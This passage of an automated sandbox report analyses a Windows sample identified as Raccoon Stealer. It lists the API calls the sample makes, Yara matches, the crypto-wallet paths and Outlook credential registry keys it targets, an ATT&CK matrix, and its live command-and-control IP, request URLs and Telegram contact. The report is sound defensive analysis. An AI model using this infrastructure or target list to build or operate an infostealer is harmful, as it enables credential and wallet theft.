                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00446625
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,0_2_0042C383
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_00437819
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00462391
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: EnumSystemLocalesW,0_2_00458577
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: GetLocaleInfoW,0_2_0046258C
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: EnumSystemLocalesW,0_2_0046267E
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: EnumSystemLocalesW,0_2_00462633
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: EnumSystemLocalesW,0_2_00462719
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004627A4
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: GetLocaleInfoW,0_2_004629F7
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00440985 cpuid 0_2_00440985
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0043E03E
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,0_2_004371FA
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,0_2_0042A2F9
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,0_2_0042C383

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: Electrum-LTC;26;Electrum-LTC\wallets;*;|
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: ElectronCash;26;ElectronCash\wallets;*;|
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: Jaxx;26;Jaxx;*;*cache*
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: ;26;exodus
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

                    Remote Access Functionality:

                    barindex
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobApplication Shimming1Application Shimming1Obfuscated Files or Information3LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Process Injection11Software Packing22Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSSystem Information Discovery36Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol15SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion1Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection11/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    31cGYywxgy.exe40%ReversingLabsWin32.Trojan.Sabsik
                    31cGYywxgy.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll0%ReversingLabs

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.2.31cGYywxgy.exe.400000.0.unpack100%AviraHEUR/AGEN.1139893Download File
                    0.1.31cGYywxgy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://194.180.174.100/Pv0%Avira URL Cloudsafe
                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl00%URL Reputationsafe
                    http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
                    http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d160%Avira URL Cloudsafe
                    http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                    https://repository.luxtrust.lu00%URL Reputationsafe
                    http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
                    http://www.mozilla.com00%URL Reputationsafe
                    http://www.chambersign.org10%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
                    http://crl.securetrust.com/STCA.crl00%URL Reputationsafe
                    http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                    http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                    http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d1670%Avira URL Cloudsafe
                    https://t..180.174.100/0%Avira URL Cloudsafe
                    https://www.microsoft.c0%Avira URL Cloudsafe
                    http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16T0%Avira URL Cloudsafe
                    https://ocsp.quovadisoffshore.com00%URL Reputationsafe
                    http://cps.chambersign.org/cps/chambersignroot.html00%URL Reputationsafe
                    http://policy.camerfirma.com00%URL Reputationsafe
                    http://194.180.174.100/0%Avira URL Cloudsafe
                    http://ocsp.accv.es00%URL Reputationsafe
                    http://ocsp.thawte.com00%URL Reputationsafe
                    https://www.catcert.net/verarrel0%URL Reputationsafe
                    http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
                    http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                    http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861ata0%Avira URL Cloudsafe
                    https://www.catcert.net/verarrel050%URL Reputationsafe
                    http://www.quovadis.bm00%URL Reputationsafe
                    http://www.accv.es000%URL Reputationsafe
                    http://www.pkioverheid.nl/policies/root-policy-G200%URL Reputationsafe
                    http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca8610%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16true
                      • Avira URL Cloud: safe
                      		unknown
                      http://194.180.174.100/true
                      • Avira URL Cloud: safe
                      		unknown
                      https://t.me/agrybirdsgamereptfalse
                        		high
                        http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://194.180.174.100/Pv31cGYywxgy.exe, 00000000.00000003.276042748.0000000002D2A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0nssckbi.dll.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://fedir.comsign.co.il/crl/ComSignCA.crl0nssckbi.dll.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.chambersign.org/chambersroot.crl0nssckbi.dll.0.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5864849777931cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpfalse
                          		high
                          https://repository.luxtrust.lu0nssckbi.dll.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://cps.chambersign.org/cps/chambersroot.html0nssckbi.dll.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://telegram.org/img/t_logo.png31cGYywxgy.exe, 00000000.00000002.282842619.0000000002D20000.00000004.00000001.sdmpfalse
                            		high
                            http://www.mozilla.com0qipcap.dll.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.com/chrome/static/images/favicons/favicon-16x16.png31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpfalse
                              		high
                              http://www.chambersign.org1nssckbi.dll.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0nssckbi.dll.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.firmaprofesional.com/cps0nssckbi.dll.0.drfalse
                                		high
                                http://www.diginotar.nl/cps/pkioverheid0nssckbi.dll.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://repository.swisssign.com/0nssckbi.dll.0.drfalse
                                  		high
                                  http://crl.securetrust.com/SGCA.crl0nssckbi.dll.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.securetrust.com/STCA.crl0nssckbi.dll.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlnssckbi.dll.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.thawte.com/ThawteTimestampingCA.crl0qipcap.dll.0.drfalse
                                    		high
                                    http://www.certplus.com/CRL/class2.crl0nssckbi.dll.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16731cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.quovadisglobal.com/cps0nssckbi.dll.0.drfalse
                                      		high
                                      https://t..180.174.100/31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%231cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0nssckbi.dll.0.drfalse
                                          		high
                                          https://www.microsoft.c31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16T31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ocsp.quovadisoffshore.com0nssckbi.dll.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://cps.chambersign.org/cps/chambersignroot.html0nssckbi.dll.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://policy.camerfirma.com0nssckbi.dll.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.mozilla.com/en-US/blocklist/mozglue.dll.0.drfalse
                                            		high
                                            http://www.accv.es/legislacion_c.htm0Unssckbi.dll.0.drfalse
                                              		high
                                              http://www.certicamara.com/dpc/0Znssckbi.dll.0.drfalse
                                                		high
                                                http://ocsp.accv.es0nssckbi.dll.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://ocsp.thawte.com0qipcap.dll.0.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://www.catcert.net/verarrelnssckbi.dll.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0nssckbi.dll.0.drfalse
                                                      		high
                                                      http://crl.chambersign.org/chambersignroot.crl0nssckbi.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://crl.xrampsecurity.com/XGCA.crl0nssckbi.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861ata31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.catcert.net/verarrel05nssckbi.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.quovadis.bm0nssckbi.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.accv.es00nssckbi.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.pkioverheid.nl/policies/root-policy-G20nssckbi.dll.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.cert.fnmt.es/dpcs/0nssckbi.dll.0.drfalse
                                                        		high
                                                        https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpfalse
                                                          		high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          194.180.174.100
                                                          		unknownunknown
                                                          		39798MIVOCLOUDMDtrue
                                                          149.154.167.99
                                                          		t.meUnited Kingdom
                                                          		62041TELEGRAMRUfalse

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:491712
                                                          Start date:27.09.2021
                                                          Start time:20:30:33
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 9m 7s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:31cGYywxgy (renamed file extension from none to exe)
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:24
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@6/62@1/2
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 79
                                                          • Number of non-executed functions: 54
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 2.20.86.117, 95.100.54.203, 20.82.210.154, 40.112.88.60, 23.10.249.43, 23.10.249.26
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491712/sample/31cGYywxgy.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          20:31:39API Interceptor4x Sleep call for process: 31cGYywxgy.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          194.180.174.100pAWNholT8X.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100//l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306
                                                          OARirszNK2.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          Neue Bestellung 09001.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          u8NGCuPdOR.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          iQjdq8GOib.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          aRJ7tjHVOF.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          4o99bctKos.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          gDvlEg3e8p.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          oz7Sa3qccH.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          1k7pDZj7AD.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          ZH2O3APZNp.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          ECzur31Emx.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          QtTTdCez49.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          22AVgXwGEK.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          22AVgXwGEK.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          NqnaRapjVU.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          SecuriteInfo.com.Packed-GDTFD6717704122.28206.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          vSHMPhFi15.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/
                                                          U6V0KwEWO7.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          t.mepAWNholT8X.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          OARirszNK2.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          rbQe356Ces.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          kzSWxYLY4H.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          nrR5LZJupm.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          Neue Bestellung 09001.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          DeKxL6OdiV.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          OTKqvzSZfm.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          u8NGCuPdOR.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          e5jVcbuCo5.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          i7qUJCnMz0.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          iQjdq8GOib.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          aRJ7tjHVOF.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          4o99bctKos.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          zsChlwJrkj.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          gDvlEg3e8p.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          oz7Sa3qccH.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          1k7pDZj7AD.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99
                                                          ZH2O3APZNp.exeGet hashmaliciousBrowse
                                                          • 149.154.167.99

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          MIVOCLOUDMDpAWNholT8X.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
                                                          OARirszNK2.exeGet hashmaliciousBrowse
                                                          • 194.180.174.100
